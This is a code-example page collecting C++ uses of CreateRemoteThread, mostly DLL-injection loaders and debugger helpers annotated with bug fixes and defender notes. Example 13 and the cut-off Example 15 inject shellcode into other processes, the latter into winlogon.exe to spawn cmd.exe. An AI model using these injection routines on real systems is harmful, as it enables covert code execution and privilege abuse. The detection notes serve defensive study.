这篇教程C++ CreateRemoteThread函数代码示例写得很实用,希望能帮到您。
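// Page intro (translated): collected usage examples of the CreateRemoteThread
// function in C++.
//
// Example 1: InjectDLL
/**
 * Starts a thread in another process that calls LoadLibraryA on `dll`.
 *
 * The path is copied into memory allocated inside the target process and a
 * remote thread is created with LoadLibraryA as its entry point and that copy
 * as its argument. The function does not wait for the remote thread, so a
 * return value of 0 means "thread created", not "library loaded".
 *
 * Defender note: OpenProcess -> VirtualAllocEx -> WriteProcessMemory ->
 * CreateRemoteThread is the call sequence that cross-process injection
 * detections look for; Sysmon records the last step as Event ID 8
 * (CreateRemoteThread).
 *
 * @param dll        NUL-terminated ANSI path of the library.
 * @param ProcessID  Id of the target process; 0 is rejected.
 * @return 0 on success; 1 invalid argument; 2 OpenProcess failed;
 *         3 LoadLibraryA could not be resolved; 4 remote allocation failed;
 *         5 remote write failed; 6 remote thread creation failed.
 */
int InjectDLL(char *dll, int ProcessID) {
    if (!ProcessID || dll == NULL) {
        return 1;
    }

    // CREATE_THREAD_ACCESS is defined elsewhere in the project.
    HANDLE Proc = OpenProcess(CREATE_THREAD_ACCESS, FALSE, ProcessID);
    if (!Proc) {
        return 2;
    }

    int status = 0;
    LPVOID RemoteStringPtr = NULL;
    HANDLE RemoteThread = NULL;

    // Include the terminating NUL: LoadLibraryA reads a C string, and the
    // original relied on the freshly committed page being zero-filled.
    const SIZE_T pathBytes = strlen(dll) + 1;

    HMODULE kernel32 = GetModuleHandleA("kernel32.dll");
    LPVOID LoadLibAddr = kernel32 ? (LPVOID)GetProcAddress(kernel32, "LoadLibraryA") : NULL;
    if (LoadLibAddr == NULL) {
        status = 3;
    }

    if (status == 0) {
        RemoteStringPtr = VirtualAllocEx(Proc, NULL, pathBytes, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
        if (RemoteStringPtr == NULL) {
            status = 4;
        }
    }

    if (status == 0 && !WriteProcessMemory(Proc, RemoteStringPtr, dll, pathBytes, NULL)) {
        status = 5;
    }

    if (status == 0) {
        RemoteThread = CreateRemoteThread(Proc, NULL, 0, (LPTHREAD_START_ROUTINE)LoadLibAddr,
                                          RemoteStringPtr, 0, NULL);
        if (RemoteThread == NULL) {
            status = 6;
        }
    }

    if (RemoteThread != NULL) {
        // Closing the handle does not stop the thread. The remote buffer is
        // left allocated because the thread may not have read it yet.
        CloseHandle(RemoteThread);
    } else if (RemoteStringPtr != NULL) {
        // No thread will ever read the buffer, so release it.
        VirtualFreeEx(Proc, RemoteStringPtr, 0, MEM_RELEASE);
    }

    // The original leaked this handle on every error path.
    CloseHandle(Proc);
    return status;
}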
开发者ID:rass89rus,项目名称:syringe,代码行数:31,
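// Example 2: CreateRemoteThread
//-----------------------------------------------------------------------------
// Name: Execute
// Object: run RemoteProcFuncAddress in the remote process on a new thread.
//         Blocking call: does not return until that thread has finished.
//         Use this function when there is no injected code (the function
//         already exists in the remote process).
//         WARNING: a direct call works only for a function that has one
//         parameter, and only if that parameter is a pointer; otherwise code
//         injection is needed, as done in RemoteGetProcAddress,
//         RemoteGetModuleHandleThreadProc and RemoteFreeLibrary.
// Parameters :
//     in  : FARPROC RemoteProcFuncAddress : remote address of the function to
//                                           execute; NULL is rejected
//     out : LPDWORD lpExitCode : exit code of the remote thread; set to 0
//                                before the thread is started
//     return : FALSE on error (bad arguments, thread not created, wait failed,
//              or exit code not retrievable), TRUE otherwise
//-----------------------------------------------------------------------------
BOOL CCodeInject::Execute(FARPROC RemoteProcFuncAddress,LPDWORD lpExitCode)
{
    // IsBadWritePtr is documented by Microsoft as obsolete; it is kept so that
    // callers passing a bad pointer still get FALSE as before.
    if (IsBadWritePtr(lpExitCode, sizeof(DWORD)))
        return FALSE;
    *lpExitCode = 0;

    // A NULL start address would only fault the new thread in the remote process.
    if (RemoteProcFuncAddress == NULL)
        return FALSE;

    // Start execution of the remote function; this->pDataRemote is its argument.
    DWORD dwThreadId = 0;
    HANDLE hThread = CreateRemoteThread(this->hProcess,
                                        NULL,
                                        0,
                                        (LPTHREAD_START_ROUTINE)RemoteProcFuncAddress,
                                        this->pDataRemote,
                                        0,
                                        &dwThreadId);
    if (!hThread)
        return FALSE;

    // Wait for the end of the thread, then report whether the exit code could
    // actually be read (the original returned TRUE even when it could not).
    BOOL bSuccess = FALSE;
    if (WaitForSingleObject(hThread, INFINITE) == WAIT_OBJECT_0)
        bSuccess = GetExitCodeThread(hThread, lpExitCode) ? TRUE : FALSE;

    CloseHandle(hThread);
    return bSuccess;
}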
开发者ID:340211173,项目名称:hf-2011,代码行数:45,
// Example 3: RemoteSynchronousCall
/**
 * Runs `function(argument)` on a new thread inside `process` and blocks until
 * that thread exits.
 *
 * ScopedHandle and THROW_ERROR are defined elsewhere in the project. Each
 * failure path invokes THROW_ERROR and then returns FALSE.
 *
 * @param process   Handle of the process the thread is created in.
 * @param function  Address used as the thread start routine.
 * @param argument  Single pointer argument passed to the start routine.
 * @param result    Receives the thread's exit code on success; it is
 *                  dereferenced without a NULL check.
 * @return TRUE on success, FALSE on any failure.
 */
BOOL RemoteSynchronousCall(HANDLE process, LPVOID function, LPVOID argument, LPDWORD result) {
    LPTHREAD_START_ROUTINE entry_point =
        static_cast<LPTHREAD_START_ROUTINE>(static_cast<LPVOID>(function));

    ScopedHandle remote_thread(
        CreateRemoteThread(process, NULL, 0, entry_point, argument, 0, NULL));
    if (remote_thread.handle == NULL) {
        THROW_ERROR("Unable to create a thread in the remote process!");
        return FALSE;
    }

    // Block until the remote thread has run to completion.
    if (WaitForSingleObject(remote_thread.handle, INFINITE) != WAIT_OBJECT_0) {
        THROW_ERROR("Unable to wait for the thread to finish!");
        return FALSE;
    }

    DWORD thread_exit_code;
    if (GetExitCodeThread(remote_thread.handle, &thread_exit_code) == FALSE) {
        THROW_ERROR("Unable to get remote thread's exit code!");
        return FALSE;
    }

    if (!remote_thread.Close()) {
        THROW_ERROR("Unable to close remote thread!");
        return FALSE;
    }

    // Publish the exit code only after every step has succeeded.
    *result = thread_exit_code;
    return TRUE;
}
开发者ID:xairy,项目名称:packet-sniffer,代码行数:30,
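// Example 4: main
/**
 * Creates PROC_NAME suspended, makes it load DLL_NAME through a remote
 * LoadLibraryW thread, then resumes its main thread.
 *
 * PROC_NAME and DLL_NAME are wide strings defined elsewhere in the project.
 * The child is resumed and all handles are closed whether or not the load
 * step succeeded.
 *
 * Defender note: a process created with CREATE_SUSPENDED that receives a
 * remote thread from its parent before its main thread is resumed is a
 * recognisable pattern in process-creation and remote-thread telemetry.
 *
 * @return 0 when the remote loader thread was started and waited for,
 *         1 when the process could not be created or a load step failed.
 */
int main() {
    STARTUPINFOW si;
    PROCESS_INFORMATION pi;
    memset(&si, 0, sizeof(si));
    memset(&pi, 0, sizeof(pi));
    si.cb = sizeof(si);  // CreateProcess expects cb to hold the structure size

    if (!CreateProcessW(PROC_NAME, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED,
                        NULL, NULL, &si, &pi)) {
        // Nothing was created; the original went on to use zeroed handles.
        return 1;
    }

    int exitStatus = 1;

    HMODULE hKernel32 = GetModuleHandleW(L"kernel32.dll");
    LPTHREAD_START_ROUTINE pLoadLibraryW =
        hKernel32 ? (LPTHREAD_START_ROUTINE)GetProcAddress(hKernel32, "LoadLibraryW") : NULL;

    // Size in bytes of the path, terminator included.
    SIZE_T dwLength = (wcslen(DLL_NAME) + 1) * sizeof(wchar_t);
    LPVOID lpLibName = pLoadLibraryW
        ? VirtualAllocEx(pi.hProcess, NULL, dwLength, MEM_COMMIT, PAGE_READWRITE)
        : NULL;

    if (lpLibName != NULL) {
        SIZE_T written = 0;
        if (WriteProcessMemory(pi.hProcess, lpLibName, DLL_NAME, dwLength, &written) &&
            written == dwLength) {
            HANDLE hThread = CreateRemoteThread(pi.hProcess, NULL, 0, pLoadLibraryW,
                                                lpLibName, 0, NULL);
            if (hThread != NULL) {
                WaitForSingleObject(hThread, INFINITE);
                CloseHandle(hThread);
                exitStatus = 0;
            }
        }
        // MEM_RELEASE requires a size of 0; the original passed dwLength, which
        // makes VirtualFreeEx fail and leaves the buffer allocated in the child.
        VirtualFreeEx(pi.hProcess, lpLibName, 0, MEM_RELEASE);
    }

    // Always let the child run so it is never left suspended.
    ResumeThread(pi.hThread);

    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);

    return exitStatus;
}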
开发者ID:revsic,项目名称:Code-Injection,代码行数:32,
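// Example 5: LoadRemoteDll
/**
 * Makes process `pid` call LoadLibraryA(dllPath) on a remote thread and waits
 * for the call to finish.
 *
 * Fixes relative to the original listing:
 *  - the process handle is closed on every path (it was never closed);
 *  - the remote buffer is released only after the remote thread has finished,
 *    and with size 0 as MEM_RELEASE requires (the original call came before
 *    the wait and, because of its non-zero size, failed);
 *  - the VirtualAllocEx result is checked;
 *  - WriteProcessMemory gets a SIZE_T out-parameter instead of a DWORD.
 *
 * NOTE(review): the exit code is a DWORD, so on a 64-bit target it presumably
 * carries only the low 32 bits of the HMODULE returned by LoadLibraryA.
 *
 * @param pid      Id of the target process.
 * @param dllPath  NUL-terminated ANSI path of the library.
 * @return true when the remote thread's exit code is non-zero, false otherwise.
 */
bool LoadRemoteDll(DWORD pid, const char* dllPath)
{
    if (dllPath == NULL)
        return false;

    HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
    if (hProc == NULL)
        return false;

    const SIZE_T pathBytes = strlen(dllPath) + 1;
    bool loaded = false;

    PVOID p = VirtualAllocEx(hProc, NULL, pathBytes, MEM_COMMIT, PAGE_READWRITE);
    if (p != NULL) {
        LPTHREAD_START_ROUTINE loadLibrary = (LPTHREAD_START_ROUTINE)
            GetProcAddress(GetModuleHandleA("Kernel32.dll"), "LoadLibraryA");
        SIZE_T written = 0;

        if (loadLibrary != NULL &&
            WriteProcessMemory(hProc, p, dllPath, pathBytes, &written) &&
            written == pathBytes) {
            HANDLE hThread = CreateRemoteThread(hProc, NULL, 0, loadLibrary, p, 0, NULL);
            if (hThread != NULL) {
                DWORD exitCode = 0;
                WaitForSingleObject(hThread, INFINITE);
                if (GetExitCodeThread(hThread, &exitCode))
                    loaded = (exitCode != 0);
                CloseHandle(hThread);
            }
        }

        // Safe here: either no thread was started or it has already exited.
        VirtualFreeEx(hProc, p, 0, MEM_RELEASE);
    }

    CloseHandle(hProc);
    return loaded;
}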
开发者ID:brock7,项目名称:xdbg,代码行数:33,
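// Example 6: Unload
/*
    Unload the DLL from the process.

    Looks up DLL_NAME in the process held by CMemCore and, when it is found,
    runs FreeLibrary on it from a remote thread and waits for that thread.
    GetModuleAddress, DLL_NAME and CMemCore are defined elsewhere in the project.

    RETURN:
        ERROR_INVALID_HANDLE when there is no process handle,
        ERROR_PROC_NOT_FOUND when FreeLibrary cannot be resolved,
        the CreateRemoteThread error code when the thread cannot be created,
        ERROR_SUCCESS otherwise (including when the DLL is not loaded).
*/
DWORD CMemDll::Unload()
{
    HANDLE hProcess = CMemCore::Instance().m_hProcess;
    if(!hProcess)
        return ERROR_INVALID_HANDLE;

    //Search for dll in process
    HMODULE hDll = (HMODULE)GetModuleAddress(GetProcessId(hProcess), TEXT(DLL_NAME));
    if(hDll == 0)
        return ERROR_SUCCESS;

    LPTHREAD_START_ROUTINE pfnFreeLibrary =
        (LPTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandleA("Kernel32.dll"), "FreeLibrary");
    if(pfnFreeLibrary == NULL)
        return ERROR_PROC_NOT_FOUND;

    HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, pfnFreeLibrary, (void*)hDll, 0, NULL);
    if(hThread == NULL)
    {
        // Read the error first: MessageBox may change the thread's last-error
        // value, so the original could return an unrelated code.
        const DWORD dwError = GetLastError();
        MessageBox(NULL, TEXT("Cannot create thread"), TEXT("Error"), MB_ICONERROR);
        return dwError;
    }

    //Wait for completion
    WaitForSingleObject(hThread, INFINITE);
    CloseHandle(hThread);

    return ERROR_SUCCESS;
}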
开发者ID:hfenigma,项目名称:darkd3,代码行数:38,
// Example 7: BaseCreateThreadPoolThread
/*
 * Creates a suspended Win32 thread in the current process by calling
 * CreateRemoteThread with NtCurrentProcess() as the target.
 *
 * Function      - start routine of the new thread.
 * Parameter     - argument handed to the start routine.
 * ThreadHandle  - receives the thread handle (NULL when creation fails).
 *
 * Returns STATUS_SUCCESS when a handle was obtained. Otherwise returns the
 * TEB's LastStatusValue, or STATUS_UNSUCCESSFUL if that value is itself a
 * success code.
 */
NTSTATUS
NTAPI
BaseCreateThreadPoolThread(IN PTHREAD_START_ROUTINE Function,
                           IN PVOID Parameter,
                           OUT PHANDLE ThreadHandle)
{
    NTSTATUS FailureStatus;

    /* The thread starts suspended; the caller decides when it runs */
    *ThreadHandle = CreateRemoteThread(NtCurrentProcess(),
                                       NULL,
                                       0,
                                       Function,
                                       Parameter,
                                       CREATE_SUSPENDED,
                                       NULL);
    if (*ThreadHandle)
    {
        return STATUS_SUCCESS;
    }

    /* No handle: report the last status, but never report success */
    FailureStatus = NtCurrentTeb()->LastStatusValue;
    if (NT_SUCCESS(FailureStatus))
    {
        FailureStatus = STATUS_UNSUCCESSFUL;
    }

    return FailureStatus;
}
开发者ID:amaneureka,项目名称:reactos,代码行数:31,
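// Example 8: WinMain
/**
 * ReLocale launcher: starts the target command suspended, loads the ReLocale
 * hook DLL into it through a remote LoadLibraryA thread, then resumes it.
 *
 * Command line: ReLocale [opts] exe [args]
 *   /M  display a message after hooking (passed on through the environment
 *       variable named by k_lpAttachNotification, defined elsewhere)
 *   /?  display the usage window
 *
 * Fixes relative to the original listing:
 *  - the target command buffer is sized from the arguments actually copied,
 *    terminator included; the original sized it from strlen(lpCmdLine) with no
 *    room for the terminator or the separators and could write past it;
 *  - separators are appended per argument (the original tested posArg, not i);
 *  - the usage text uses real newlines; it was printed with "/n" and with a
 *    raw line break inside the literal;
 *  - the hook name buffer is zero-filled, so no uninitialised stack bytes are
 *    copied into the child;
 *  - API results are checked and handles and allocations are released.
 *
 * NOTE(review): arguments are re-joined with single spaces, so quoting of
 * arguments that contain spaces is lost, as in the original.
 * NOTE(review): the hook DLL is named without a path, so the child resolves it
 * through the normal DLL search order; a full path would pin the file loaded.
 *
 * @return 0 after showing help or launching the target, 1 on a setup failure.
 */
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
    int nArgs = 0;
    LPWSTR* lpszArgs = CommandLineToArgvW(GetCommandLineW(), &nArgs);
    if (lpszArgs == NULL) {
        return 1;
    }

    int showHelp = (nArgs < 2);
    int showAttachNotification = 0;
    LPWSTR lpszTargetCmd = NULL;

    for (int posArg = 1; posArg < nArgs; posArg++) {
        if (!wcscmp(lpszArgs[posArg], L"/?")) {
            showHelp = 1;
            break;
        }
        if (!wcscmp(lpszArgs[posArg], L"/M")) {
            showAttachNotification = 1;
            continue;
        }

        // First non-option argument: it and everything after it form the
        // target command line. Each argument needs its length plus one
        // character for the separator (or, for the last one, the terminator).
        size_t cchTarget = 0;
        for (int i = posArg; i < nArgs; i++) {
            cchTarget += wcslen(lpszArgs[i]) + 1;
        }

        lpszTargetCmd = (wchar_t*) calloc(cchTarget, sizeof(wchar_t));
        if (lpszTargetCmd == NULL) {
            LocalFree(lpszArgs);
            return 1;
        }

        wchar_t* lpszTargetTemp = lpszTargetCmd;
        for (int i = posArg; i < nArgs; i++) {
            const size_t nArgLength = wcslen(lpszArgs[i]);
            memcpy(lpszTargetTemp, lpszArgs[i], nArgLength * sizeof(wchar_t));
            lpszTargetTemp += nArgLength;
            if (i < nArgs - 1) {
                *lpszTargetTemp++ = L' ';
            }
        }
        break;
    }

    // Without a target there is nothing to launch, so show the usage text.
    if (showHelp || lpszTargetCmd == NULL) {
        MessageBox(0,
                   L"ReLocale by kolpazar\n\nUsage: ReLocale [opts] exe [args]\n\nOpts:\n"
                   L"/M Display a message after hooking\n/? Display this window",
                   L"ReLocale", MB_OK);
        free(lpszTargetCmd);
        LocalFree(lpszArgs);
        return 0;
    }

    if (showAttachNotification) {
        SetEnvironmentVariable(k_lpAttachNotification, L"1");
    }

    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    ZeroMemory(&si, sizeof(STARTUPINFO));
    ZeroMemory(&pi, sizeof(PROCESS_INFORMATION));
    si.cb = sizeof(STARTUPINFO);

    if (!CreateProcess(NULL, lpszTargetCmd, NULL, NULL, FALSE,
                       NORMAL_PRIORITY_CLASS | CREATE_SUSPENDED, NULL, NULL, &si, &pi)) {
        free(lpszTargetCmd);
        LocalFree(lpszArgs);
        return 1;
    }

    char szHookLibrary[MAX_PATH] = {0};
#ifndef _M_AMD64
    strcpy(szHookLibrary, "ReLocaleHook.dll");
#else
    strcpy(szHookLibrary, "ReLocaleHook64.dll");
#endif

    LPVOID lpProcessMem = VirtualAllocEx(pi.hProcess, NULL, sizeof(szHookLibrary),
                                         MEM_COMMIT, PAGE_READWRITE);
    if (lpProcessMem != NULL &&
        WriteProcessMemory(pi.hProcess, lpProcessMem, szHookLibrary, sizeof(szHookLibrary), NULL)) {
        LPTHREAD_START_ROUTINE pfnLoadLibraryA = (LPTHREAD_START_ROUTINE)
            GetProcAddress(GetModuleHandle(L"kernel32.dll"), "LoadLibraryA");
        HANDLE hDllThread = pfnLoadLibraryA
            ? CreateRemoteThread(pi.hProcess, NULL, 0, pfnLoadLibraryA, lpProcessMem, 0, NULL)
            : NULL;
        if (hDllThread != NULL) {
            // The hook must be loaded before the target's main thread runs.
            WaitForSingleObject(hDllThread, INFINITE);
            CloseHandle(hDllThread);
        }
    }

    // Resume even when hooking failed so the child is never left suspended.
    ResumeThread(pi.hThread);

    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
    free(lpszTargetCmd);
    LocalFree(lpszArgs);
    return 0;
}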
开发者ID:kolpazar,项目名称:relocale,代码行数:60,
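// Example 9: InjectCreateProcess
/**
 * Creates process `pName` suspended, has it load `pDllName` through a remote
 * LoadLibraryA thread, waits for that thread, then resumes the main thread.
 *
 * Failure handling follows the original's pattern: a failure before the child
 * exists prints a message and returns (GetCurrentDirectory) or exits
 * (CreateProcessA); a failure afterwards prints a message, terminates the
 * child with exit code 42 and exits with EXIT_FAILURE.
 *
 * Fixes relative to the original listing:
 *  - WriteProcessMemory, GetProcAddress and CreateRemoteThread are checked
 *    (the original waited on and closed a possibly NULL thread handle);
 *  - the process and thread handles from CreateProcessA are closed;
 *  - the environment argument is NULL instead of GetEnvironmentStrings(),
 *    whose block was never freed; NULL makes the child inherit this process's
 *    environment;
 *  - a current-directory result that does not fit the buffer is rejected;
 *  - messages end in a real newline (they were printed with "/n").
 *
 * @param pName     Application name passed to CreateProcessA.
 * @param pDllName  NUL-terminated ANSI path of the library.
 * @param pCmdArg   Command line passed to CreateProcessA.
 */
VOID InjectCreateProcess(PCHAR pName, PCHAR pDllName, PCHAR pCmdArg)
{
    STARTUPINFOA si;
    PROCESS_INFORMATION pi;
    CHAR CurrentPath[MAX_PATH];

    if (pDllName == NULL) {
        return;
    }

    // A return value >= the buffer size means the path did not fit.
    const DWORD cchPath = GetCurrentDirectoryA(sizeof(CurrentPath) - 1, CurrentPath);
    if (cchPath == 0 || cchPath >= sizeof(CurrentPath) - 1) {
        printf("[-] InjectCreateProcess - GetCurrentDirectory failed : %lu\n", GetLastError());
        return;
    }

    memset(&si, 0, sizeof(si));
    si.cb = sizeof(si);
    memset(&pi, 0, sizeof(pi));

    if (!CreateProcessA(pName, pCmdArg, NULL, NULL, FALSE, CREATE_SUSPENDED,
                        NULL, CurrentPath, &si, &pi)) {
        printf("[-] InjectCreateProcess - CreateProcessA() failed : %lu\n", GetLastError());
        exit(EXIT_FAILURE);
    }

    const SIZE_T cbDllName = strlen(pDllName) + 1;
    LPVOID pRemoteName = VirtualAllocEx(pi.hProcess, 0, cbDllName, MEM_COMMIT, PAGE_READWRITE);
    if (pRemoteName == NULL) {
        printf("[-] InjectCreateProcess - VirtualAllocEx failed() : %lu\n", GetLastError());
        TerminateProcess(pi.hProcess, 42);
        exit(EXIT_FAILURE);
    }

    if (!WriteProcessMemory(pi.hProcess, pRemoteName, (void*)pDllName, cbDllName, NULL)) {
        printf("[-] InjectCreateProcess - WriteProcessMemory failed() : %lu\n", GetLastError());
        TerminateProcess(pi.hProcess, 42);
        exit(EXIT_FAILURE);
    }

    HMODULE hKernel32 = GetModuleHandleA("kernel32.dll");
    LPTHREAD_START_ROUTINE pfnLoadLibraryA =
        hKernel32 ? (LPTHREAD_START_ROUTINE)GetProcAddress(hKernel32, "LoadLibraryA") : NULL;
    HANDLE hThread = pfnLoadLibraryA
        ? CreateRemoteThread(pi.hProcess, NULL, 0, pfnLoadLibraryA, pRemoteName, 0, NULL)
        : NULL;
    if (hThread == NULL) {
        printf("[-] InjectCreateProcess - CreateRemoteThread failed() : %lu\n", GetLastError());
        TerminateProcess(pi.hProcess, 42);
        exit(EXIT_FAILURE);
    }

    // The library load must finish before the main thread starts running.
    WaitForSingleObject(hThread, INFINITE);
    CloseHandle(hThread);

    ResumeThread(pi.hThread);
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
}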
开发者ID:philicious,项目名称:hacnpx,代码行数:35,
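// Example 10: VirtualAllocEx
/**
 * Makes `hProcess` call LoadLibraryA(szLibPath) on a remote thread and waits
 * for that thread to finish.
 *
 * Fixes relative to the original listing:
 *  - the VirtualAllocEx and GetProcAddress results are checked;
 *  - the remote buffer is released with size 0, as MEM_RELEASE requires; the
 *    original passed sizeof(pRemoteLibraryPath), which makes the release fail
 *    and leaves the buffer allocated in the target.
 *
 * @param hProcess   Handle of the target process.
 * @param szLibPath  NUL-terminated ANSI path of the library.
 * @return true when the path was written in full and the remote thread was
 *         created and waited for; false otherwise. The result of the remote
 *         LoadLibraryA call itself is not inspected.
 */
bool CUtils::InjectLibraryIntoProcess(HANDLE hProcess, char * szLibPath)
{
    if(szLibPath == NULL)
        return false;

    const size_t sLibraryPathLen = (strlen(szLibPath) + 1);
    void * pRemoteLibraryPath = VirtualAllocEx(hProcess, NULL, sLibraryPathLen, MEM_COMMIT, PAGE_READWRITE);
    if(pRemoteLibraryPath == NULL)
        return false;

    bool bReturn = false;
    SIZE_T sBytesWritten = 0;

    if(WriteProcessMemory(hProcess, pRemoteLibraryPath, (void *)szLibPath, sLibraryPathLen, &sBytesWritten)
        && sBytesWritten == sLibraryPathLen)
    {
        FARPROC pfnLoadLibraryA = GetProcAddress(GetModuleHandleA("Kernel32"), "LoadLibraryA");
        HANDLE hThread = pfnLoadLibraryA
            ? CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pfnLoadLibraryA, pRemoteLibraryPath, 0, NULL)
            : NULL;

        if(hThread)
        {
            WaitForSingleObject(hThread, INFINITE);
            CloseHandle(hThread);
            bReturn = true;
        }
    }

    // Either no thread was started or it has exited, so nothing reads the buffer.
    VirtualFreeEx(hProcess, pRemoteLibraryPath, 0, MEM_RELEASE);
    return bReturn;
}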
开发者ID:LeeHM,项目名称:etmp,代码行数:31,
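// Example 11: InjectDLL
/**
 * Makes `hProcess` call LoadLibraryA(szDllPath) on a remote thread and waits
 * for that thread to finish.
 *
 * Fixes relative to the original listing:
 *  - the remote buffer is released on every path once it exists (the early
 *    returns leaked it) and with size 0, as MEM_RELEASE requires;
 *  - the buffer size is in bytes (characters * sizeof(TCHAR)).
 *
 * NOTE(review): LoadLibraryA expects an ANSI path, so the call is only
 * correct when TCHAR is char, i.e. in a non-UNICODE build.
 *
 * @param hProcess   Handle of the target process.
 * @param szDllPath  NUL-terminated path of the library.
 * @return 0 when the remote thread was created and waited for, -1 otherwise.
 */
int InjectDLL(HANDLE hProcess, TCHAR *szDllPath)
{
    if(szDllPath == NULL)
        return -1;

    const SIZE_T cbDllPath = ((SIZE_T)lstrlen(szDllPath) + 1) * sizeof(TCHAR);
    LPVOID RemoteProcessMemory = VirtualAllocEx(hProcess, NULL, cbDllPath, MEM_RESERVE|MEM_COMMIT, PAGE_READWRITE);
    if(RemoteProcessMemory == NULL)
        return -1;

    int nResult = -1;

    if(WriteProcessMemory(hProcess, RemoteProcessMemory, (PVOID)szDllPath, cbDllPath, NULL))
    {
        PTHREAD_START_ROUTINE pfnThreadRtn = (PTHREAD_START_ROUTINE)
            GetProcAddress(GetModuleHandleA("kernel32"), "LoadLibraryA");
        HANDLE hThread = pfnThreadRtn
            ? CreateRemoteThread(hProcess, NULL, 0, pfnThreadRtn, RemoteProcessMemory, 0, NULL)
            : NULL;

        if(hThread != NULL)
        {
            WaitForSingleObject(hThread, INFINITE);
            CloseHandle(hThread);
            nResult = 0;
        }
    }

    // Either no thread was started or it has exited, so nothing reads the buffer.
    VirtualFreeEx(hProcess, RemoteProcessMemory, 0, MEM_RELEASE);
    return nResult;
}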
开发者ID:2016Sun,项目名称:binarybook,代码行数:33,
// Example 12: injectDLL
/**
 * Makes `process` call LoadLibraryW(dllName) on a remote thread and reports
 * whether that thread's exit code was non-zero.
 *
 * loadStringToMemory is defined elsewhere in the project; here it supplies the
 * address passed to the remote thread as its argument. This function does not
 * release that address afterwards.
 *
 * @param process  Handle of the target process.
 * @param dllName  Wide-character name or path of the library.
 * @return true when the remote thread ran and exited with a non-zero code;
 *         false when an address could not be obtained, the thread could not be
 *         created, or the exit code was zero.
 */
bool injectDLL(HANDLE process, const wchar_t* dllName)
{
    LPVOID loaderEntry = GetProcAddress(GetModuleHandleA("kernel32.dll"), "LoadLibraryW");
    LPVOID remoteName = loadStringToMemory(process, dllName);
    if (!remoteName || !loaderEntry)
    {
        return false;
    }

    HANDLE loaderThread = CreateRemoteThread(process, NULL, NULL,
                                             static_cast<LPTHREAD_START_ROUTINE>(loaderEntry),
                                             remoteName, NULL, NULL);
    if (!loaderThread)
    {
        return false;
    }

    // Wait for the remote call to finish before reading its result.
    WaitForSingleObject(loaderThread, INFINITE);

    DWORD threadExitCode;
    GetExitCodeThread(loaderThread, &threadExitCode);
    CloseHandle(loaderThread);

    return threadExitCode != 0;
}
开发者ID:caznova,项目名称:PackerAttacker,代码行数:25,
// Example 13: inject
/**
 * Copies the file-level `shellcode` buffer (defined elsewhere) into process
 * `pid` and starts a remote thread at the copy.
 *
 * Behaviour as written:
 *  - returns early when the handle compares equal to INVALID_HANDLE_VALUE
 *    (NOTE(review): OpenProcess is documented to return NULL on failure);
 *  - the WriteProcessMemory result is not checked;
 *  - the process handle is closed only on the allocation-failure path and the
 *    thread handle is never closed.
 *
 * Defender note: the observable artefacts are a PROCESS_ALL_ACCESS handle to
 * another process, a private PAGE_EXECUTE_READWRITE allocation made in it, and
 * a remote thread whose start address lies in that allocation rather than in a
 * loaded image. Sysmon Event ID 10 (ProcessAccess) and Event ID 8
 * (CreateRemoteThread) cover the first and last of these.
 *
 * @param pid  Id of the target process.
 */
void inject(DWORD pid)
{
    HANDLE hTarget = OpenProcess(PROCESS_ALL_ACCESS, 0, pid);
    if (hTarget == INVALID_HANDLE_VALUE)
    {
        printf("/nOpenProcess() Failed.");
        return;
    }

    // Writable and executable region inside the target process.
    LPVOID remoteBuffer = VirtualAllocEx(hTarget, 0, sizeof(shellcode),
                                         MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (remoteBuffer == NULL)
    {
        printf("/nVirtualAllocEx() Failed");
        CloseHandle(hTarget);
        return;
    }

    WriteProcessMemory(hTarget, remoteBuffer, shellcode, sizeof(shellcode), 0);
    printf("/nInjection successfull/n");
    printf("Running Shellcode....../n");

    HANDLE hRemoteThread = CreateRemoteThread(hTarget, NULL, 0,
                                              (LPTHREAD_START_ROUTINE)remoteBuffer,
                                              NULL, 0, 0);
    if (hRemoteThread == NULL)
    {
        printf("Failed to Run Shellcode/n");
        return;
    }

    printf("shellcode Execution Successfull");
}
开发者ID:MeteorAdminz,项目名称:exploit-database,代码行数:30,
// Example 14: GetModuleHandle
/**
 * Runs the Kernel32 export named `functionName` on a new thread inside
 * `process`, passing `param` as its single argument, and waits for it.
 *
 * The export's address is looked up in this process and used as the remote
 * thread's start address.
 *
 * @param process       Handle of the target process.
 * @param functionName  Name of the Kernel32 export to run.
 * @param param         Argument passed to the remote thread.
 * @param exitCode      Receives the thread's exit code; the GetExitCodeThread
 *                      result is not checked.
 * @return false when the export is not found or the thread cannot be created,
 *         true otherwise.
 */
bool DebugFrontend::ExecuteRemoteKernelFuntion(HANDLE process, const char* functionName, LPVOID param, DWORD& exitCode)
{
    FARPROC entryPoint = GetProcAddress(GetModuleHandle("Kernel32"), functionName);
    if (entryPoint == NULL)
    {
        return false;
    }

    DWORD remoteThreadId;
    HANDLE remoteThread = CreateRemoteThread(process, NULL, 0,
                                             (LPTHREAD_START_ROUTINE)entryPoint,
                                             param, 0, &remoteThreadId);
    if (remoteThread == NULL)
    {
        return false;
    }

    // Block until the remote call has completed, then collect its result.
    WaitForSingleObject(remoteThread, INFINITE);
    GetExitCodeThread(remoteThread, &exitCode);
    CloseHandle(remoteThread);

    return true;
}
开发者ID:Halfbrick,项目名称:decoda,代码行数:31,
// Example 15: Launch
/**
 * Writes an embedded byte string into the process whose image name is
 * winlogon.exe and starts a remote thread at the written address.
 *
 * getProcessId is defined elsewhere in the project. No return value is
 * checked and no handle is closed. The byte string is reproduced exactly as
 * printed on the page; its trailing bytes spell the ASCII text "cmd.exe".
 *
 * Defender note: the observable artefacts are a PROCESS_ALL_ACCESS handle
 * opened on winlogon.exe, a 0x1000-byte private PAGE_EXECUTE_READWRITE
 * allocation made in it, and a remote thread whose start address lies in that
 * allocation rather than in a loaded image. Sysmon Event ID 10 (ProcessAccess)
 * and Event ID 8 (CreateRemoteThread) cover the first and last of these.
 */
void Launch()
{
    char shellcode[] =
